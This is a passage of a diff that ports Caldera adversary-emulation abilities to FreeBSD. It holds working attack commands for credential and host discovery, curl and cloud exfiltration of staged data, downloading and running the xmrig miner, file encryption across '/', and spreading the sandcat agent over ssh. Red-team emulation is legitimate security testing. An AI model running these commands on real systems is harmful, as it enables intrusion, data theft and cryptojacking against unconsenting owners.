nmap -sV -p #{remote.host.port} #{remote.host.ip}
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
ps aux | grep #{host.user.name}
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
ps aux | grep #{host.user.name}
|
||||
|
|
@ -0,0 +1,17 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml
|
||||
@@ -28,3 +28,14 @@
|
||||
target: remote.host.port
|
||||
payloads:
|
||||
- scanner.py
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ python3.9 scanner.py -i #{remote.host.ip}
|
||||
+ parsers:
|
||||
+ plugins.stockpile.app.parsers.scan:
|
||||
+ - source: remote.host.ip
|
||||
+ edge: has_open_port
|
||||
+ target: remote.host.port
|
||||
+ payloads:
|
||||
+ - scanner.py
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
ls
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
ls
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml
|
||||
@@ -42,6 +42,6 @@
|
||||
darwin:
|
||||
sh:
|
||||
command: ps aux
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
- command: ps aux
|
||||
\ No newline at end of file
|
||||
+ command: ps aux
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml
|
||||
@@ -15,6 +15,6 @@
|
||||
darwin:
|
||||
sh:
|
||||
command: groups
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
- command: groups
|
||||
\ No newline at end of file
|
||||
+ command: groups
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
cat ~/.ssh/known_hosts
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
cat ~/.ssh/known_hosts
|
||||
|
|
@ -0,0 +1,13 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml
|
||||
@@ -15,6 +15,10 @@
|
||||
sh:
|
||||
command: |
|
||||
netstat -anto
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ netstat -aSp tcp
|
||||
windows:
|
||||
psh:
|
||||
command: |
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml
|
||||
@@ -14,7 +14,7 @@
|
||||
- source: host.print.file
|
||||
edge: has_size
|
||||
target: host.print.size
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: lpq -a
|
||||
parsers:
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
pwd
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
pwd
|
||||
|
|
@ -0,0 +1,10 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml
|
||||
@@ -16,3 +16,7 @@
|
||||
sh:
|
||||
command: |
|
||||
which google-chrome
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ which chrome
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml
|
||||
@@ -14,7 +14,7 @@
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.ipaddr:
|
||||
- source: remote.host.ip
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: arp -a
|
||||
parsers:
|
||||
@@ -25,4 +25,4 @@
|
||||
command: arp -a
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.ipaddr:
|
||||
- - source: remote.host.ip
|
||||
\ No newline at end of file
|
||||
+ - source: remote.host.ip
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
which go
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
which go
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml
|
||||
@@ -6,7 +6,7 @@
|
||||
attack_id: T1083
|
||||
name: File and Directory Discovery
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: 'find ~ -type f -name #{host.print.file} 2>/dev/null'
|
||||
parsers:
|
||||
|
|
@ -0,0 +1,13 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml
|
||||
@@ -16,6 +16,10 @@
|
||||
sh:
|
||||
command: |
|
||||
python3 --version;python2 --version;python --version
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ pkg version -x python3 | cut -d '-' -f2 | awk '{print $1}' && pkg version -x python2 | cut -d '-' -f2 | awk '{print $1}'
|
||||
windows:
|
||||
cmd:
|
||||
command: |
|
||||
|
|
@ -0,0 +1,13 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml
|
||||
@@ -8,7 +8,7 @@
|
||||
attack_id: T1016
|
||||
name: System Network Configuration Discovery
|
||||
platforms:
|
||||
- darwin:
|
||||
+ darwin,freebsd:
|
||||
sh:
|
||||
command: |
|
||||
- ifconfig | grep broadcast
|
||||
\ No newline at end of file
|
||||
+ ifconfig | grep broadcast
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
whoami
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
whoami
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml
|
||||
@@ -15,7 +15,7 @@
|
||||
plugins.stockpile.app.parsers.basic:
|
||||
- source: host.user.name
|
||||
- source: domain.user.name
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: whoami
|
||||
parsers:
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
|
||||
@@ -15,7 +15,7 @@
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.basic:
|
||||
- source: host.user.name
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml
|
||||
@@ -8,7 +8,7 @@
|
||||
attack_id: T1018
|
||||
name: Remote System Discovery
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: host "#{target.org.domain}" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev
|
||||
parsers:
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
sudo ifconfig
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
sudo ifconfig
|
||||
|
|
@ -0,0 +1,20 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml
|
||||
@@ -12,6 +12,10 @@
|
||||
sh:
|
||||
command: |
|
||||
pwpolicy getaccountpolicies
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ cat /etc/pam.d/passwd
|
||||
linux:
|
||||
sh:
|
||||
command: |
|
||||
@@ -19,4 +23,4 @@
|
||||
windows:
|
||||
psh:
|
||||
command: |
|
||||
- net accounts
|
||||
\ No newline at end of file
|
||||
+ net accounts
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml
|
||||
@@ -15,7 +15,7 @@
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.basic:
|
||||
- source: host.current.time
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
date -u +"%Y-%m-%dT%H:%M:%SZ"
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml
|
||||
@@ -14,7 +14,7 @@
|
||||
pkill -f sandcat
|
||||
payloads:
|
||||
- sandcat.go
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
nohup ./sandcat.go -server #{server} &
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml
|
||||
@@ -10,7 +10,7 @@
|
||||
attack_id: T1567.001
|
||||
name: Exfiltration to Code Repository
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: | # Temporary file needed to avoid curl length restrictions
|
||||
GHUser="#{github.user.name}";
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml
|
||||
@@ -6,7 +6,7 @@
|
||||
attack_id: T1029
|
||||
name: Scheduled Transfer
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
crontab -l > /tmp/origcron;
|
||||
@@ -46,4 +46,4 @@
|
||||
|
||||
Register-ScheduledTask -TaskName "Scheduled exfiltration" -Trigger $trigger -Action $action;
|
||||
cleanup: |
|
||||
- Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false;
|
||||
\ No newline at end of file
|
||||
+ Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false;
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml
|
||||
@@ -6,7 +6,7 @@
|
||||
attack_id: T1560.001
|
||||
name: 'Archive Collected Data: Archive via Utility'
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
tar -czf #{host.dir.git}.tar.gz -C "#{host.dir.git}" .; printf #{host.dir.git}.tar.gz;
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml
|
||||
@@ -17,7 +17,7 @@
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.basic:
|
||||
- source: host.dir.compress
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz
|
||||
@@ -38,4 +38,4 @@
|
||||
- source: host.dir.compress
|
||||
requirements:
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: host.dir.staged
|
||||
\ No newline at end of file
|
||||
+ - source: host.dir.staged
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml
|
||||
@@ -43,7 +43,7 @@
|
||||
$result = $sr.ReadToEnd();
|
||||
$result;
|
||||
$res.close();
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
LocalFile='#{host.dir.compress}';
|
||||
@@ -55,4 +55,4 @@
|
||||
--data-binary @#{host.dir.compress}
|
||||
requirements:
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: host.dir.compress
|
||||
\ No newline at end of file
|
||||
+ - source: host.dir.compress
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml
|
||||
@@ -6,7 +6,7 @@
|
||||
attack_id: T1567.001
|
||||
name: Exfiltration to Code Repository
|
||||
platforms:
|
||||
- linux: # https://docs.github.com/en/rest/reference/repos#contents
|
||||
+ freebsd,linux: # https://docs.github.com/en/rest/reference/repos#contents
|
||||
sh:
|
||||
command: |
|
||||
GHUser="#{github.user.name}";
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml
|
||||
@@ -11,7 +11,7 @@
|
||||
attack_id: T1030
|
||||
name: Data Transfer Size Limits
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
attack_id: T1567.001
|
||||
name: Exfiltration to Code Repository
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
GHUser="#{github.user.name}";
|
||||
@@ -62,4 +62,4 @@
|
||||
};
|
||||
requirements:
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: host.dir.staged
|
||||
\ No newline at end of file
|
||||
+ - source: host.dir.staged
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml
|
||||
@@ -9,7 +9,7 @@
|
||||
attack_id: T1537
|
||||
name: 'Transfer Data to Cloud Account'
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
LocalFile='#{host.dir.compress}';
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml
|
||||
@@ -8,7 +8,7 @@
|
||||
attack_id: T1048.003
|
||||
name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
LocalFile='#{host.dir.compress}';
|
||||
@@ -35,4 +35,4 @@
|
||||
$requestStream.Dispose();
|
||||
requirements:
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: host.dir.compress
|
||||
\ No newline at end of file
|
||||
+ - source: host.dir.compress
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml
|
||||
@@ -8,7 +8,7 @@
|
||||
attack_id: T1567.002
|
||||
name: 'Exfiltration to Cloud Storage'
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
LocalFile='#{host.dir.compress}';
|
||||
@@ -30,4 +30,4 @@
|
||||
aws s3 rm s3://#{s3.source.name}/$RemoteName;
|
||||
requirements:
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: host.dir.compress
|
||||
\ No newline at end of file
|
||||
+ - source: host.dir.compress
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload
|
||||
|
|
@ -0,0 +1,22 @@
|
|||
--- plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
|
||||
@@ -19,6 +19,19 @@
|
||||
cleanup: |
|
||||
rm -rf ./xmrig*;
|
||||
timeout: 120
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ # FreeBSD should include `timeout` making this easy.
|
||||
+ # We expect timeout to return a 124, which needs to then return a 0
|
||||
+ # to make Caldera UI happy.
|
||||
+ command: |
|
||||
+ wget https://github.com/xmrig/xmrig/releases/download/v6.19.2/xmrig-6.19.2-freebsd-static-x64.tar.gz;
|
||||
+ tar -xf xmrig-6.19.2-freebsd-static-x64.tar.gz;
|
||||
+ timeout 60 ./xmrig-6.19.2/xmrig;
|
||||
+ [ $? -eq 124 ]
|
||||
+ cleanup: |
|
||||
+ rm -rf ./xmrig*;
|
||||
+ timeout: 120
|
||||
darwin:
|
||||
sh:
|
||||
# MacOS does not include timeout, but can mimic the process with screen.
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
echo "proof that this machine was hacked." > message.txt
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
echo "proof that this machine was hacked." > message.txt
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
command: ./mission.go -duration 60 -extension .caldera -dir '/'
|
||||
payloads:
|
||||
- mission.go
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: ./mission.go -duration 60 -extension .caldera -dir '/'
|
||||
payloads:
|
||||
|
|
@ -0,0 +1,16 @@
|
|||
--- plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
|
||||
@@ -24,4 +24,13 @@
|
||||
ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
|
||||
payloads:
|
||||
- sandcat.go-linux
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go &&
|
||||
+ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
|
||||
+ cleanup: |
|
||||
+ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
|
||||
+ payloads:
|
||||
+ - sandcat.go-freebsd
|
||||
singleton: True
|
||||
Some files were not shown because too many files have changed in this diff Show more
Loading…
Reference in a new issue